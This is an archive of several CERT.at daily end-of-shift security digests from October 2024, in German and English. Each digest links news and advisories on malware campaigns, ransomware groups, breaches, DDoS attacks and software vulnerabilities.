===================== = End-of-Day report = ===================== Timeframe: Dienstag 08-10-2024 18:00 − Mittwoch 09-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Two never-before-seen tools, from same group, infect air-gapped devices ∗∗∗ --------------------------------------------- Its hard enough creating one air-gap-jumping tool. GoldenJackal did it 2x in 5 years. --------------------------------------------- https://arstechnica.com/security/2024/10/two-never-before-seen-tools-from-s… ∗∗∗ European govt air-gapped systems breached using custom malware ∗∗∗ --------------------------------------------- An APT hacking group known as GoldenJackal has successfully breached air-gapped government systems in Europe using two custom toolsets to steal sensitive data, like emails, encryption keys, images, archives, and documents. --------------------------------------------- https://www.bleepingcomputer.com/news/security/european-govt-air-gapped-sys… ∗∗∗ New scanner finds Linux, UNIX servers exposed to CUPS RCE attacks ∗∗∗ --------------------------------------------- An automated scanner has been released to help security professionals scan environments for devices vulnerable to the Common Unix Printing System (CUPS) RCE flaw tracked as CVE-2024-47176. --------------------------------------------- https://www.bleepingcomputer.com/news/software/new-scanner-finds-linux-unix… ∗∗∗ Sicherheitslücke: RDP-Server von Windows aus der Ferne angreifbar ∗∗∗ --------------------------------------------- Ein erfolgreicher Angriff erfordert zwar eine gewonnene Race Condition, dafür aber keinerlei Authentifizierung oder Nutzer-Interaktion. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-rdp-server-von-windows-aus-der-… ∗∗∗ Cisco warnt: Kinder erhöhen Cyberrisiko im Homeoffice ∗∗∗ --------------------------------------------- Laut Cisco erlauben rund zwei Drittel aller Eltern im Homeoffice ihren Kindern den Zugriff auf beruflich genutzte Geräte - häufig sogar unbeaufsichtigt. --------------------------------------------- https://www.golem.de/news/cisco-warnt-kinder-erhoehen-cyberrisiko-im-homeof… ∗∗∗ From Perfctl to InfoStealer ∗∗∗ --------------------------------------------- A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I wont repeat what has been already disclosed. I found a .. --------------------------------------------- https://isc.sans.edu/diary/From+Perfctl+to+InfoStealer/31334 ∗∗∗ Ransomware gang Trinity joins pile of scumbags targeting healthcare ∗∗∗ --------------------------------------------- As if hospitals and clinics didnt have enough to worry about At least one US healthcare provider has been infected by Trinity, an emerging cybercrime gang with eponymous ransomware that uses double extortion and other "sophisticated" tactics that make it a "significant threat," according to the feds. --------------------------------------------- https://www.theregister.com/2024/10/09/trinity_ransomware_targets_healthcar… ∗∗∗ Patch Tuesday, October 2024 Edition ∗∗∗ --------------------------------------------- Microsoft today released security updates to fix at least 117 security holes in Windows computers and other software, including two vulnerabilities that are already seeing active attacks. Also, Adobe plugged 52 security holes .. --------------------------------------------- https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-edition/ ∗∗∗ How to handle vulnerability reports in aviation ∗∗∗ --------------------------------------------- TL;DR Always thank researchers for reporting vulnerabilities. Acknowledging their efforts can set the right tone. Lead all communications with researchers. Don’t let legal or PR teams take over. Provide .. --------------------------------------------- https://www.pentestpartners.com/security-blog/how-to-handle-vulnerability-r… ∗∗∗ So stehlen Kriminelle mit gefälschten FinanzOnline-Benachrichtigungen Ihre Bankomatkarte ∗∗∗ --------------------------------------------- Sie werden per SMS über eine Rückerstattung vom Finanzamt informiert und klicken auf den Link. Sie gelangen auf die Webseite des Finanzamts – zumindest sieht es so aus. Sie wählen Ihre Bank aus, um das Geld zu erhalten. Doch plötzlich kommt eine Fehlermeldung von Ihrer Bank. Sie erhalten eine neue Bankomatkarte und müssen die alte zerschneiden und .. --------------------------------------------- https://www.watchlist-internet.at/news/so-stehlen-kriminelle-kartenwechsel-… ∗∗∗ Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware ∗∗∗ --------------------------------------------- Discover how North Korean attackers, posing as recruiters, used an updated downloader and backdoor in a campaign targeting tech job seekers. --------------------------------------------- https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-jo… ∗∗∗ Schwachstellen in Intels Sicherheitstechnologie TDX entdeckt ∗∗∗ --------------------------------------------- Wissenschaftler von der Universität zu Lübeck haben Schwachstellen in Intels Trusted Domain Extensions identifiziert. Intel hat eine Lücke bereits geschlossen. --------------------------------------------- https://heise.de/-9974224 ===================== = Vulnerabilities = ===================== ∗∗∗ Synology-SA-24:12 GitLab ∗∗∗ --------------------------------------------- A vulnerability allows remote attacker to bypass authentication via a susceptible version of GitLab. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_12 ∗∗∗ DSA-5729-2 apache2 - regression update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00200.html ∗∗∗ Announcement: Drupal core issues with some risk levels may be treated as bugs in the public issue queue, not as private security issues - PSA-2023-07-12 ∗∗∗ --------------------------------------------- https://www.drupal.org/psa-2023-07-12 ∗∗∗ Local Privilege Escalation mittels MSI installer in Palo Alto Networks GlobalProtect ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/local-privilege-escal… ∗∗∗ October Security Update ∗∗∗ --------------------------------------------- https://www.ivanti.com/blog/october-2024-security-update -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.10.2024
by Daily end-of-shift report 08 Oct '24

08 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 07-10-2024 18:00 − Dienstag 08-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ ADT discloses second breach in 2 months, hacked via stolen credentials ∗∗∗ --------------------------------------------- Home and small business security company ADT disclosed it suffered a breach after threat actors gained access to its systems using stolen credentials and exfiltrated employee account data. --------------------------------------------- https://www.bleepingcomputer.com/news/security/adt-discloses-second-breach-… ∗∗∗ Casio reports IT systems failure after weekend network breach ∗∗∗ --------------------------------------------- Japanese tech giant Casio has suffered a cyberattack after an unauthorized actor accessed its networks on October 5, causing system disruption that impacted some of its services. --------------------------------------------- https://www.bleepingcomputer.com/news/security/casio-reports-it-systems-fai… ∗∗∗ New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered a new botnet malware family called Gorilla (aka GorillaBot) that draws its inspiration from the leaked Mirai botnet source code.Cybersecurity firm NSFOCUS, which identified the activity last month, said the botnet "issued over 300,000 attack commands, with a shocking attack density" between September 4 and September 27, 2024. --------------------------------------------- https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.h… ∗∗∗ Feds reach for sliver of crypto-cash nicked by North Koreas notorious Lazarus Group ∗∗∗ --------------------------------------------- The US government is attempting to claw back more than $2.67 million stolen by North Koreas Lazarus Group, filing two lawsuits to force the forfeiture of millions in Tether and Bitcoin.… --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/10/08/us_lazarus_g… ∗∗∗ Shining Light on the Dark Angels Ransomware Group ∗∗∗ --------------------------------------------- The Dark Angels ransomware threat group launched attacks beginning in April 2022, and has since been quietly executing highly targeted attacks. Dark Angels operate with more stealthy and sophisticated strategies than many other ransomware groups. Instead of outsourcing breaches to third-party initial access brokers that target a wide range of victims, Dark Angels launch their own attacks that focus on a limited number of large companies. --------------------------------------------- https://www.zscaler.com/blogs/security-research/shining-light-dark-angels-r… ∗∗∗ 7,000 WordPress Sites Affected by Unauthenticated Critical Vulnerabilities in LatePoint WordPress Plugin ∗∗∗ --------------------------------------------- On September 17, 2024, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for two critical vulnerabilities in the LatePoint plugin, which is estimated to be actively installed on more than 7,000 WordPress websites. --------------------------------------------- https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-una… ∗∗∗ Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware ∗∗∗ --------------------------------------------- In November 2023, we identified a BlackCat ransomware intrusion started by Nitrogen malware hosted on a website impersonating Advanced IP Scanner. Nitrogen was leveraged to deploy Sliver and Cobalt Strike beacons on the beachhead host and perform further malicious actions. --------------------------------------------- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-end… ∗∗∗ Ukrainian pleads guilty to running Raccoon Infostealer malware, agrees to pay nearly $1 million ∗∗∗ --------------------------------------------- A Ukrainian national pleaded guilty in U.S. federal court to running the Raccoon Infostealer malware, and agreed to pay victims more than $900,000 as part of the plea deal. --------------------------------------------- https://therecord.media/raccoon-stealer-operator-pleads-guilty ∗∗∗ TAG Bulletin: Q3 2024 ∗∗∗ --------------------------------------------- This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2024. It was last updated on October 7, 2024. --------------------------------------------- https://blog.google/threat-analysis-group/tag-bulletin-q3-2024/ ∗∗∗ Crypto-Stealing Code Lurking in Python Package Dependencies ∗∗∗ --------------------------------------------- On September 22nd, a new PyPI user orchestrated a wide-ranging attack by uploading multiple packages within a short timeframe. These packages, bearing names like “AtomicDecoderss,” “TrustDecoderss,” “WalletDecoderss,” and “ExodusDecodes,” masqueraded as legitimate tools for decoding and managing data from an array of popular cryptocurrency wallets. --------------------------------------------- https://checkmarx.com/blog/crypto-stealing-code-lurking-in-python-package-d… ∗∗∗ Okta Fixes Critical Vulnerability Allowing Sign-On Policy Bypass ∗∗∗ --------------------------------------------- Okta fixed a vulnerability in its Classic product that allowed attackers to bypass sign-on policies. Exploitation required valid credentials and the use of an “unknown” device. Affected users should review system logs. --------------------------------------------- https://hackread.com/okta-fixes-sign-on-policy-bypass-vulnerability/ ∗∗∗ Cyberattack on American Water Shuts Down Customer Portal, Halts Billing ∗∗∗ --------------------------------------------- American Water faces a cyberattack, disrupting its customer portal and billing operations. The company assures that water services remain unaffected while cybersecurity experts manage the incident. --------------------------------------------- https://hackread.com/american-water-cyberattack-shuts-down-portal-billing/ ∗∗∗ Storm-1575 Threat Actor Deploys New Login Panels for Phishing Infrastructure ∗∗∗ --------------------------------------------- The Storm-1575 group is known for frequently rebranding its phishing infrastructure. Recently, ANY.RUN analysts identified the deployment of new login panels, which are part of the threat actor’s ongoing efforts to compromise users’ Microsoft and Google accounts. --------------------------------------------- https://hackread.com/storm-1575-threat-actor-new-login-panels-phishing-infr… ∗∗∗ Lua Malware Targeting Student Gamers via Fake Game Cheats ∗∗∗ --------------------------------------------- Morphisec Threat Labs uncovers sophisticated Lua malware targeting student gamers and educational institutions. Learn how these attacks work and how to stay protected. --------------------------------------------- https://hackread.com/lua-malware-hit-student-gamers-fake-game-cheats/ ===================== = Vulnerabilities = ===================== ∗∗∗ Qualcomm patches high-severity zero-day exploited in attacks ∗∗∗ --------------------------------------------- Qualcomm has released security patches for a zero-day vulnerability in the Digital Signal Processor (DSP) service that impacts dozens of chipsets. --------------------------------------------- https://www.bleepingcomputer.com/news/security/qualcomm-patches-high-severi… ∗∗∗ TYPO3-CORE-SA-2024-012: Information Disclosure in TYPO3 Page Tree ∗∗∗ --------------------------------------------- It has been discovered that TYPO3 CMS is susceptible to information disclosure. --------------------------------------------- https://typo3.org/security/advisory/typo3-core-sa-2024-012 ∗∗∗ TYPO3-CORE-SA-2024-011: Denial of Service in TYPO3 Bookmark Toolbar ∗∗∗ --------------------------------------------- It has been discovered that TYPO3 CMS is susceptible to denial of service. --------------------------------------------- https://typo3.org/security/advisory/typo3-core-sa-2024-011 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (kernel), Fedora (webkitgtk), Mageia (cups), Oracle (e2fsprogs, kernel, and kernel-container), Red Hat (buildah, container-tools:rhel8, containernetworking-plugins, git-lfs, go-toolset:rhel8, golang, grafana-pcp, podman, and skopeo), SUSE (Mesa, mozjs115, podofo, and redis7), and Ubuntu (cups and cups-filters). --------------------------------------------- https://lwn.net/Articles/993276/ ∗∗∗ Kritische Sicherheitslücken in Draytek-Geräten erlauben Systemübernahme ∗∗∗ --------------------------------------------- Forscher fanden im Betriebssystem der Vigor-Router vierzehn neue Lücken, betroffen sind zwei Dutzend teilweise veraltete Typen. Patches stehen bereit. --------------------------------------------- https://heise.de/-9973906 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.10.2024
by Daily end-of-shift report 07 Oct '24

07 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 04-10-2024 18:00 − Montag 07-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Russia arrests US-sanctioned Cryptex founder, 95 other linked suspects ∗∗∗ --------------------------------------------- Russian law enforcement detained almost 100 suspects linked to the Cryptex cryptocurrency exchange, the UAPS anonymous payment service, and 33 other online services and platforms used to make illegal payments and sell stolen credentials. --------------------------------------------- https://www.bleepingcomputer.com/news/security/russia-arrests-us-sanctioned… ∗∗∗ MoneyGram: No evidence ransomware is behind recent cyberattack ∗∗∗ --------------------------------------------- MoneyGram says there is no evidence that ransomware is behind a recent cyberattack that led to a five-day outage in September. --------------------------------------------- https://www.bleepingcomputer.com/news/security/moneygram-no-evidence-ransom… ∗∗∗ Spielzeugmarke: Hack der Lego-Webseite zielt auf Kryptobetrug ab ∗∗∗ --------------------------------------------- Am 4. Oktober 2024 wurde die offizielle Website von Lego Opfer eines Hacks. Unbekannte bewarben eine Kryptowährung namens Lego-Coin. --------------------------------------------- https://www.golem.de/news/spielzeugmarke-hack-der-lego-webseite-zielt-auf-k… ∗∗∗ Nach US-Bann: Kaspersky fliegt weltweit aus dem Google Play Store ∗∗∗ --------------------------------------------- Kaspersky-Software ist seit Tagen nicht mehr im Play Store erhältlich. Ursache ist das US-Verbot des russischen Herstellers - mit globalen Auswirkungen. --------------------------------------------- https://www.golem.de/news/nach-us-bann-kaspersky-fliegt-weltweit-aus-dem-go… ∗∗∗ Awaken Likho is awake: new techniques of an APT group ∗∗∗ --------------------------------------------- Kaspersky experts have discovered a new version of the APT Awaken Likho RAT Trojan, which uses AutoIt scripts and the MeshCentral system to target Russian organizations. --------------------------------------------- https://securelist.com/awaken-likho-apt-new-implant-campaign/114101/ ∗∗∗ HUMINT and its Role within Cybersecurity ∗∗∗ --------------------------------------------- This blog explores HUMINTs role in cybersecurity, detailing its implementation, benefits, and potential risks. --------------------------------------------- https://www.sans.org/blog/humint-and-its-role-within-cybersecurity ∗∗∗ Largest Recorded DDoS Attack is 3.8 Tbps ∗∗∗ --------------------------------------------- Cloudflare just blocked the current record DDoS attack: 3.8 terabits per second. (Lots of good information on the attack, and DDoS in general, at the link.) --------------------------------------------- https://www.schneier.com/blog/archives/2024/10/largest-recorded-ddos-attack… ∗∗∗ Critical Apache Avro SDK Flaw Allows Remote Code Execution in Java Applications ∗∗∗ --------------------------------------------- A critical security flaw has been disclosed in the Apache Avro Java Software Development Kit (SDK) that, if successfully exploited, could allow the execution of arbitrary code on susceptible instances.The flaw, tracked as CVE-2024-47561, .. --------------------------------------------- https://thehackernews.com/2024/10/critical-apache-avro-sdk-flaw-allows.html ∗∗∗ Chinesische Hacker stehlen sensible Daten von US-Gerichten ∗∗∗ --------------------------------------------- Via Internetdienstanbieter verschafft sich die "Salt Typhoon"-Kampagne Zugriff zu heiklen Daten. US-Behörden befürchten weitere Angriffe --------------------------------------------- https://www.derstandard.at/story/3000000239609/chinesische-hacker-stehlen-s… ∗∗∗ No Way to Hide: Uncovering New Campaigns from Daily Tunneling Detection ∗∗∗ --------------------------------------------- Four DNS tunneling campaigns identified through a new machine learning tool expose intricate tactics when targeting vital sectors like finance, healthcare and more. --------------------------------------------- https://unit42.paloaltonetworks.com/detecting-dns-tunneling-campaigns/ ∗∗∗ From Pwn2Own Automotive: More Autel Maxicharger Vulnerabilities ∗∗∗ --------------------------------------------- This blog post highlights two additional vulnerabilities in the Autel Maxicharger that were exploited at Pwn2Own Automotive 2024. Details of the patches are also included. --------------------------------------------- https://www.thezdi.com/blog/2024/10/2/from-pwn2own-automotive-more-autel-ma… ∗∗∗ Russian state media company operation disrupted by ‘unprecedented’ cyberattack ∗∗∗ --------------------------------------------- Russian state television and radio broadcasting company VGTRK was hit by a cyberattack on Monday that disrupted its operations, the company confirmed in a statement to local news agencies. --------------------------------------------- https://therecord.media/russian-state-media-company-disrupted-cyberattack ∗∗∗ Engaging with Boards to improve the management of cyber security risk ∗∗∗ --------------------------------------------- How to communicate more effectively with board members to improve cyber security decision making. --------------------------------------------- https://www.ncsc.gov.uk/guidance/board-level-cyber-discussions-communicatin… ∗∗∗ Forensic Readiness in Container Environments ∗∗∗ --------------------------------------------- One of the most frustrating issues that Digital Forensics and Incident Response (DFIR) consultants encounter is a lack of forensic data available for analysis. This article aims to mitigate such situations by providing key considerations for improving forensic readiness. --------------------------------------------- https://www.nccgroup.com/us/research-blog/forensic-readiness-in-container-e… ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-5785-1 mediawiki - security update ∗∗∗ --------------------------------------------- Dom Walden discovered that the AbuseFilter extension in MediaWiki, a website engine for collaborative work, performed incomplete authorisation checks. --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00198.html ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (go-toolset:rhel8 and linux-firmware), Arch Linux (oath-toolkit), Debian (e2fsprogs, firefox-esr, libgsf, mediawiki, and oath-toolkit), Fedora (aws, chromium, firefox, p7zip, pgadmin4, python-gcsfs, unbound, webkitgtk, znc, znc-clientbuffer, and znc-push), Mageia (ghostscript and rootcerts nss firefox firefox-l10n), .. --------------------------------------------- https://lwn.net/Articles/993160/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.10.2024
by Daily end-of-shift report 04 Oct '24

04 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 03-10-2024 18:00 − Freitag 04-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps ∗∗∗ --------------------------------------------- During a distributed denial-of-service campaign targeting organizations in the financial services, internet, and telecommunications sectors, volumetric attacks peaked at 3.8 terabits per second, the largest publicly recorded to date. The assault consisted of a "month-long" barrage of more than 100 hyper-volumetric DDoS attacks flood. [..] Many of the attacks aimed at the target’s network infrastructure (network and transport layers L3/4) exceeded two billion packets per second (pps) and three terabits per second (Tbps). [..] The threat actor behind the campaign leveraged multiple types of compromised devices, which included a large number of Asus home routers, Mikrotik systems, DVRs, and web servers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cloudflare-blocks-largest-re… ∗∗∗ Over 4,000 Adobe Commerce, Magento shops hacked in CosmicSting attacks ∗∗∗ --------------------------------------------- Approximately 5% of all Adobe Commerce and Magento online stores, or 4,275 in absolute numbers, have been hacked in "CosmicSting" attacks. [..] The CosmicSting vulnerability (CVE-2024-34102) is a critical severity information disclosure flaw; when chained with CVE-2024-2961, a security issue in glibc's iconv function, an attacker can achieve remote code execution on the target server. [..] Sansec says that multiple threat actors are now conducting attacks as patching speed is not matching the critical nature of the situation. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-4-000-adobe-commerce-ma… ∗∗∗ Survey of CUPS exploit attempts, (Fri, Oct 4th) ∗∗∗ --------------------------------------------- It is about a week since the release of the four CUPS remote code execution vulnerabilities. After the vulnerabilities became known, I configured one of our honeypots that watches a larger set of IPs to specifically collect UDP packets to port 631. Here is a quick summary of the results. --------------------------------------------- https://isc.sans.edu/diary/rss/31326 ∗∗∗ Apple fixes bug that let VoiceOver shout your passwords ∗∗∗ --------------------------------------------- Apple just fixed a duo of security bugs in iOS 18.0.1 and iPadOS 18.0.1, one of which might cause users' saved passwords to be read aloud. It's hardly an ideal situation for the visually impaired. For those who rely on the accessibility features baked into their iGadgets, namely Apple's VoiceOver screen reader, now is a good time to apply the latest update. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/10/04/apple_voiceo… ∗∗∗ Sicherheitsupdates: Cisco patcht Lücken in Produkten quer durch die Bank ∗∗∗ --------------------------------------------- Neben einem kritischen Fehler kümmert sich der Netzwerkausrüster auch um einige Lücken mit mittlerem und hohem Risikograd. Patches stehen bereit. --------------------------------------------- https://heise.de/-9961998 ∗∗∗ DRAY:BREAK Breaking Into DreyTek Routers Before Threat Actors Do It Again ∗∗∗ --------------------------------------------- In 2024, routers are a primary target for cybercriminals and state-sponsored attackers – and are the riskiest device category on networks. With this knowledge, we investigated one vendor with a history of security flaws to help it address its issues and prevent new attacks. Our latest research discovered 14 new vulnerabilities in DrayTek routers. --------------------------------------------- https://www.forescout.com/resources/draybreak-draytek-research/ ∗∗∗ Threat actor believed to be spreading new MedusaLocker variant since 2022 ∗∗∗ --------------------------------------------- Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” The distinguishable techniques — including consistently storing the same set of tools in the same location on compromised systems, the use of tools that have the PDB path with the string “paid_memes,” and the use of a lateral movement tool named “checker” — used in the attack led us to take a deeper look to try to understand more about this threat actor. --------------------------------------------- https://blog.talosintelligence.com/threat-actor-believed-to-be-spreading-ne… ∗∗∗ Ransomware Groups Demystified: CyberVolk Ransomware ∗∗∗ --------------------------------------------- As part of our ongoing efforts to monitor emerging cyber threats, we have analyzed the activities of CyberVolk, a politically motivated hacktivist group that transitioned into using ransomware and has been active since June 2024. --------------------------------------------- https://www.rapid7.com/blog/post/2024/10/03/ransomware-groups-demystified-c… ∗∗∗ Google Adds New Pixel Security Features to Block 2G Exploits and Baseband Attacks ∗∗∗ --------------------------------------------- Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks. --------------------------------------------- https://thehackernews.com/2024/10/android-14-adds-new-security-features.html ∗∗∗ Portable Hacking Lab: Control The Smallest Kali Linux With a Smartphone ∗∗∗ --------------------------------------------- Running Kali Linux on a Raspberry Pi Zero is a fantastic way to create a portable, powerful testing device. This guide will walk you through setting up Kali Linux Pi-Tail on a headless Raspberry Pi Zero 2 W that is powered and controlled from a smartphone via SSH or VNC that provides a graphical interface to your Pi-Tail. --------------------------------------------- https://www.mobile-hacker.com/2024/10/04/portable-hacking-lab-control-the-s… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, golang, linux-firmware, and thunderbird), Debian (kernel and zabbix), Fedora (firefox, pgadmin4, and php), Mageia (chromium-browser-stable, cjson, hostapd and wpa_supplicant, and openjpeg2), Oracle (firefox, flatpak, and go-toolset:ol8), Red Hat (cups-filters, firefox, grafana, linux-firmware, python3, python3.11, and python3.9), SUSE (expat, firefox, libpcap, and opensc), and Ubuntu (freeradius, imagemagick, and unzip). --------------------------------------------- https://lwn.net/Articles/992936/ ∗∗∗ Keycloak 26.0.0 released ∗∗∗ --------------------------------------------- CVE-2024-7318 - Use of a Key Past its Expiration Date in org.keycloak:keycloak-core, CVE-2024-8883 Vulnerable Redirect URI Validation Results in Open Redirect , CVE-2024-8698 Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak, CVE-2024-7254 - Stack-based Buffer Overflow in com.google.protobuf:protobuf-java --------------------------------------------- https://www.keycloak.org/2024/10/keycloak-2600-released ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 23, 2024 to September 29, 2024) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.10.2024
by Daily end-of-shift report 03 Oct '24

03 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 02-10-2024 18:00 − Donnerstag 03-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Fake browser updates spread updated WarmCookie malware ∗∗∗ --------------------------------------------- A new FakeUpdate campaign targeting users in France leverages compromised websites to show fake browser and application updates that spread a new version of the WarmCookie malware. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fake-browser-updates-spread-… ∗∗∗ FIN7 hackers launch deepfake nude “generator” sites to spread malware ∗∗∗ --------------------------------------------- The notorious APT hacking group known as FIN7 launched a network of fake AI-powered deepnude generator sites to infect visitors with information-stealing malware. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fin7-hackers-launch-deepfake… ∗∗∗ Weird Zimbra Vulnerability ∗∗∗ --------------------------------------------- Hackers can execute commands on a remote computer by sending malformed emails to a Zimbra mail server. It’s critical, but difficult to exploit.In an email sent Wednesday afternoon, Proofpoint researcher Greg Lesnewich seemed to largely concur that the attacks weren’t likely to lead to mass infections that could install ransomware or espionage .. --------------------------------------------- https://www.schneier.com/blog/archives/2024/10/weird-zimbra-vulnerability.h… ∗∗∗ INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa ∗∗∗ --------------------------------------------- INTERPOL has announced the arrest of eight individuals in Côte dIvoire and Nigeria as part of a crackdown on phishing scams and romance cyber fraud.Dubbed Operation Contender 2.0, the initiative is designed to tackle cyber-enabled crimes .. --------------------------------------------- https://thehackernews.com/2024/10/interpol-arrests-8-in-major-phishing.html ∗∗∗ APT and financial attacks on industrial organizations in Q2 2024 ∗∗∗ --------------------------------------------- This summary provides an overview of the reports of APT and financial attacks on industrial enterprises that were disclosed in Q2 2024, as well as the related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities. --------------------------------------------- https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-in… ∗∗∗ Experts warn of DDoS attacks using linux printing vulnerability ∗∗∗ --------------------------------------------- A set of bugs that has caused alarm among cybersecurity experts may enable threat actors to launch powerful attacks designed to knock systems offline. --------------------------------------------- https://therecord.media/ddos-attacks-cups-linux-print-vulnerability ∗∗∗ As ransomware attacks surge, UK privacy regulator investigating fewer incidents than ever ∗∗∗ --------------------------------------------- Of the 1,253 incidents reported to the Information Commissioner’s Office (ICO) in 2023, only 87 were investigated — fewer than 7%. The numbers so far for 2024 are similar. --------------------------------------------- https://therecord.media/uk-ico-ransomware-investigations-data ∗∗∗ Threat actor believed to be spreading new MedusaLocker variant since 2022 ∗∗∗ --------------------------------------------- Cisco Talos has discovered a financially motivated threat actor, active since 2022, recently observed delivering a MedusaLocker ransomware variant. Intelligence collected by Talos on tools regularly employed by the threat .. --------------------------------------------- https://blog.talosintelligence.com/threat-actor-believed-to-be-spreading-ne… ∗∗∗ perfctl: A Stealthy Malware Targeting Millions of Linux Servers ∗∗∗ --------------------------------------------- In this blog post, Aqua Nautilus researchers aim to shed light on a Linux malware that, over the past 3-4 years, has actively sought more than 20,000 types of misconfigurations in order to target and exploit Linux servers. If you .. --------------------------------------------- https://blog.aquasec.com/perfctl-a-stealthy-malware-targeting-millions-of-l… ∗∗∗ "Alptraum": Daten aller niederländischen Polizisten geklaut – von Drittstaat? ∗∗∗ --------------------------------------------- Hacker haben die Kontaktdaten aller Mitarbeiter der Polizei erbeutet. Nun kommt das Justizministerium mit einer weiteren alarmierenden Nachricht. --------------------------------------------- https://heise.de/-9961529 ∗∗∗ Thailändische Regierung von neuem APT "CeranaKeeper" angegriffen ∗∗∗ --------------------------------------------- Bei Angriffen auf thailändische Behörden erbeuteten Cyberkriminelle Daten, indem sie verschlüsselte Dateien zu Filesharing-Diensten hochluden. --------------------------------------------- https://heise.de/-9961562 ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1321: Apple macOS AppleVADriver Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-40841. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1321/ ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (cups-filters), Debian (chromium and php8.2), Fedora (firefox), Oracle (cups-filters, flatpak, kernel, krb5, oVirt 4.5 ovirt-engine, and python-urllib3), Red Hat (cups-filters, firefox, go-toolset:rhel8, golang, and thunderbird), SUSE (postgresql16), and Ubuntu (gnome-shell and linux-azure-fde-5.15). --------------------------------------------- https://lwn.net/Articles/992798/ ∗∗∗ Two-factor Authentication (TFA) - Critical - Access bypass - SA-CONTRIB-2024-043 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-043 ∗∗∗ Cisco Nexus Dashboard Fabric Controller Arbitrary Command Execution Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.10.2024
by Daily end-of-shift report 02 Oct '24

02 Oct '24

